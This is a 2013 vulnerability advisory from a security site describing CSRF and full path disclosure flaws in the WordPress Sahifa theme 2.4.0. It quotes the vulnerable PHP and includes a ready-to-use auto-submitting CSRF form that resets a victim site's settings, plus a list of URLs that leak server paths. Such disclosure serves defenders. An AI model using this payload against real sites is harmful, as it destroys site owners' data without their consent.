Wordpress Sahifa theme 2.4.0 CSRF and Full Path Disclosure

2013.01.02
Credit: AkaStep
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

============================================ Software: Wordpress Sahifa theme Version: 2.4.0 Vendor: http://themes.tielabs.com/ Software License: Shareware *cost $45* Vulnerabilities: This software is prone to CSRF and FULL PATH DISCLOSURE vulnerabilities. ============================================ Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH ============================================ [*] CSRF VULNERABILITY [*] The following CSRF exploit on successfully exploitation will "reset" site settings. Be Careful: It will lead to data destruction (you will lost your site settings) Here is that vulnerable code sections: File: panel/mpanel-ui.php ==SECTION 1=========BEGIN SNIP================= <form method="post"> <div class="mpanel-reset"> <input name="reset" class="mpanel-reset-button" type="submit" onClick="if(confirm('All settings will be rest .. Are you sure ?')) return true ; else return false; " value="Reset Settings" /> <input type="hidden" name="action" value="reset" /> </div> </form> =================== END SNIP ===================== File: panel/mpanel-functions.php ===SECTION 2=======BEGIN SNIP=================== if( isset( $_REQUEST['action'] ) ){ if( 'reset' == $_REQUEST['action'] ) { global $default_data; tie_save_settings( $default_data ); header("Location: admin.php?page=panel&reset=true"); die; } } =============== END SNIP ===================== ============ BEGIN CSRF EXPLOIT ============ <h1>Wordpress sahifa theme CSRF exploit By AkaStep<br></h1> <body onload="javascript:document.forms[0].submit()"> <form method="post" action="http://hacker1.own/wp/wp-admin/admin.php?page=panel&reset=true"> <input type="hidden" name="action" value="reset" /> <!-- <input name="reset" type="submit" value="Reset Settings" />--> </form> ============ END OF CSRF EXPLOIT ============ [*] FULL PATH DISCLOSURE: [*] Just Direct access: http://hacker1.own/wp/wp-content/themes/sahifa/category.php Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/category.php on line 1 Other files also disclosures similar info. Here is that files: http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/shortcode.php http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php?page[]= Warning: htmlentities() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php on line 2 http://hacker1.own/wp/wp-content/themes/sahifa/panel/post-options.php http://hacker1.own/wp/wp-content/themes/sahifa/panel/notifier/update-notifier.php http://hacker1.own/wp/wp-content/themes/sahifa/panel/custom-slider.php http://hacker1.own/wp/wp-content/themes/sahifa/panel/mpanel-functions.php http://hacker1.own/wp/wp-content/themes/sahifa/sidebar-footer.php http://hacker1.own/wp/wp-content/themes/sahifa/author.php http://hacker1.own/wp/wp-content/themes/sahifa/index.php Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/index.php on line 1 http://hacker1.own/wp/wp-content/themes/sahifa/search.php http://hacker1.own/wp/wp-content/themes/sahifa/functions.php http://hacker1.own/wp/wp-content/themes/sahifa/footer.php http://hacker1.own/wp/wp-content/themes/sahifa/comments.php http://hacker1.own/wp/wp-content/themes/sahifa/archive.php http://hacker1.own/wp/wp-content/themes/sahifa/functions/widgetize-theme.php http://hacker1.own/wp/wp-content/themes/sahifa/functions/common-scripts.php http://hacker1.own/wp/wp-content/themes/sahifa/functions/theme-functions.php http://hacker1.own/wp/wp-content/themes/sahifa/functions/updates.php http://hacker1.own/wp/wp-content/themes/sahifa/page.php http://hacker1.own/wp/wp-content/themes/sahifa/template-sitemap.php http://hacker1.own/wp/wp-content/themes/sahifa/template-login.php http://hacker1.own/wp/wp-content/themes/sahifa/template-tags.php http://hacker1.own/wp/wp-content/themes/sahifa/single.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-related.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-share.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-news-pic.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-google.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-custom-author.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-posts.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-text-html.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-feedburner.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-ads.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-flickr.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-video.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-tabbed.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-author.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-search.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-social.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-twitter.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-facebook.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-reviews.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-counter.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-category.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-login.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-comments-avatar.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-head.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-meta.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider-category.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/single-post-share.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/breaking-news.php http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets.php http://hacker1.own/wp/wp-content/themes/sahifa/template-timeline.php http://hacker1.own/wp/wp-content/themes/sahifa/loop.php http://hacker1.own/wp/wp-content/themes/sahifa/template-feed.php http://hacker1.own/wp/wp-content/themes/sahifa/tag.php http://hacker1.own/wp/wp-content/themes/sahifa/template-restrict.php http://hacker1.own/wp/wp-content/themes/sahifa/template-blog.php http://hacker1.own/wp/wp-content/themes/sahifa/404.php http://hacker1.own/wp/wp-content/themes/sahifa/template-authors.php http://hacker1.own/wp/wp-content/themes/sahifa/sidebar.php =========================== HAPPY NEW YEAR! ================================== ================================================ SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS: ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep

References:

http://themes.tielabs.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top